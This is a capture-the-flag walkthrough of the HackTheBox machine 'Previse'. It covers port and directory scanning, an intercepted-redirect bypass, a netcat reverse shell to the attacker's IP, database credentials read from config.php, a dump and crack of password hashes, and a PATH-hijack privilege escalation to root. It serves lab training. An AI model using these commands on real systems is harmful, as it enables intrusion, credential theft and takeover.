PREVISE
Scanning
NMAP
➜ ~ nmap -T4 previse.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 12:12 EDT
Nmap scan report for previse.htb (10.10.11.104)
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 28.71 secondsfast scan to know open ports
Enumeration
port 80
whatweb
➜ ~ sudo whatweb http://previse.htb/login.php
http://previse.htb/login.php [200 OK] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.11.104], Meta-Author[m4lwhere], PasswordField[password], Script, Title[Previse Login]gobuster
➜ ~ gobuster dir -u http://previse.htb -w ~/SecLists/Discovery/Web-Content/common.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://previse.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/x/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/08/16 13:17:17 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess.php (Status: 403) [Size: 276]
/.hta.php (Status: 403) [Size: 276]
/.htpasswd.php (Status: 403) [Size: 276]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/download.php (Status: 302) [Size: 0] [--> login.php]
/favicon.ico (Status: 200) [Size: 15406]
/files.php (Status: 302) [Size: 8395] [--> login.php]
/footer.php (Status: 200) [Size: 217]
/header.php (Status: 200) [Size: 980]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
/login.php (Status: 200) [Size: 2224]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/nav.php (Status: 200) [Size: 1248]
/server-status (Status: 403) [Size: 276]
/status.php (Status: 302) [Size: 2971] [--> login.php]
===============================================================
2021/08/16 13:21:31 Finished
===============================================================When we hold the package we will need to change the status code. Let’s do this for.
And click Forward
Let’s enter the site with a small change.
Now let’s press Forward.
Yes, now let’s create a user. And check out the site.
There is a file here. Download it and check it out.
Mysql information
Exploit
select log data from here
I will try to get myself a reverse shell from here
command nc -e /bin/sh 10.10.16.17 1234
add and encode ...
python -c 'import pty;pty.spawn("/bin/bash")'
from backup we had download open config.php file
Credentials root:mySQL_p@ssw0rd!:) at previse DB
www-data@previse:/var/www/html$ mysql -u root -p
Enter password: mySQL_p@ssw0rd!:)
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
mysql> use previse;
mysql> show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
mysql> select * from accounts;
+----+-------------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+-------------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | userr | $1$🧂llol$XqhFt5KI.KI/bVVL8EfOe0 | 2021-08-16 12:58:24 |
| 3 | kibouo | $1$🧂llol$T5FnvDN5sWXa6Eyh1tbUW. | 2021-08-16 13:01:44 |
| 4 | javelin | $1$🧂llol$6lhphbLFAgKFSGAuFY76l1 | 2021-08-16 13:06:24 |
| 5 | unclebill | $1$🧂llol$CjeIHiaoyZqRadtFHRc4W/ | 2021-08-16 13:12:03 |
| 6 | Giorgi | $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 | 2021-08-16 13:37:57 |
| 7 | demouser | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 14:17:32 |
| 8 | asdfg | $1$🧂llol$n3EuPeTN2PYbg2K57TRhn1 | 2021-08-16 15:02:17 |
| 9 | vector | $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 | 2021-08-16 15:11:19 |
| 10 | loller | $1$🧂llol$6Os6x8QhVyFg6Bm3Pwq/L0 | 2021-08-16 15:48:12 |
| 11 | ericsonsito | $1$🧂llol$oXlR8DTdeOZRd4X9sEOAE0 | 2021-08-16 16:08:19 |
| 12 | xdann1 | $1$🧂llol$3RRrRSP1eU1VYCn0WJj8p0 | 2021-08-16 16:12:12 |
| 13 | b1sh0p | $1$🧂llol$C01fgIC5dqKV/r53IgKr11 | 2021-08-16 17:12:52 |
| 14 | admin | $1$🧂llol$uXqzPW6SXUONt.AIOBqLy. | 2021-08-16 17:17:34 |
| 15 | skiddy | $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// | 2021-08-16 17:23:31 |
| 16 | ayman | $1$🧂llol$k86J15RFrQV35C.YluXi30 | 2021-08-16 17:40:38 |
| 17 | newguy | $1$🧂llol$Z94NSX5l4okWmemOfhGQ30 | 2021-08-16 17:41:22 |
| 18 | adilop | $1$🧂llol$6HoyCpVc.ZwWioSMmBO1C1 | 2021-08-16 17:45:59 |
| 19 | newuser | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-16 17:46:19 |
| 20 | random1234 | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-16 18:01:37 |
+----+-------------+------------------------------------+---------------------+after cracking ...
Credential m4lwhere:ilovecody112235!
Privilege Escalation
check sudo rights
we can run access_backup.sh as root
this file trigger gzip lets overwrite it and export path
m4lwhere@previse: echo '#!/bin/bash
cp /bin/bash /tmp/c
chmod u+s /tmp/c' > gzip;
m4lwhere@previse: chmod +x gzip;
m4lwhere@previse: export PATH=/tmp:$PATH;
m4lwhere@previse: sudo /opt/scripts/access_backup.sh;
m4lwhere@previse: ./c -p
c-4 ~# cat /root/root.txt
*******************Last updated
